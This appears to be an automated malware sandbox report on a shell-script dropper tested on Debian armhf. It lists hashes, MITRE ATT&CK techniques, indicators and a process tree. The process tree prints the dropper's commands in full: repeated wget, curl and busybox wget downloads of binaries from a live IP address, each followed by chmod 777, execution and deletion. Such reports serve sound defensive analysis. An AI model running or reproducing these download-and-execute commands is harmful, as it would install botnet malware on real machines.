Analysis
-
max time kernel
22s -
max time network
24s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh
-
Size
10KB
-
MD5
118703c0a4a3c409c9c3a62451bc05dc
-
SHA1
f86516dadf0b8b763c9434308235fded3779a920
-
SHA256
48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354
-
SHA512
7fc6a00fea8e8a324bdba664f96cd43bc436986c71ac389e30e0199b0ae0db8bb224245ff75234a1b0a251d2f53725e4f356edb1fa214030e13574019649afdc
-
SSDEEP
192:m6ZhSdBA8H6Z+2tEbkO5+2tElSZhSdB66:m6ZhSdBlH6cbkO8lSZhSdBP
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 18 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 809 chmod 822 chmod 828 chmod 722 chmod 738 chmod 753 chmod 802 chmod 694 chmod 834 chmod 858 chmod 846 chmod 852 chmod 672 chmod 708 chmod 760 chmod 816 chmod 768 chmod 840 chmod -
Executes dropped EXE 18 IoCs
ioc pid Process /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z 674 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO 696 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S 710 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME 723 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV 741 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH 754 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal 761 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 769 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS 803 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 810 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 817 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 823 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 829 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj 835 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 841 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 847 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 853 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 859 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 -
Checks CPU configuration 1 TTPs 18 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 769 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 770 rm 763 wget 764 curl 765 busybox -
Writes file to tmp directory 18 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH curl File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV curl File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S curl File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO curl File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME curl File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z curl
Processes
-
/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh/tmp/48288462dbbc90a8a4822e3dec971fbf1de463cfd00d4c0af8a632314b9e4354.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:653
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:658
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:669
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:672
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:674
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:675
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:677
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:679
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:684
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:697
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:698
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:702
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:706
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:708
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:711
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:720
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:723
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:725
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:735
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:751
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:759
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:760
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:762
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:763
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:765
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:769
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:795
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:803
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:805
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:807
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:815
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:821
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:827
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:833
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:836
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:837
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:839
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:843
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:845
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:848
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:849
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:851
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:854
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:855
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:857
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:861
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97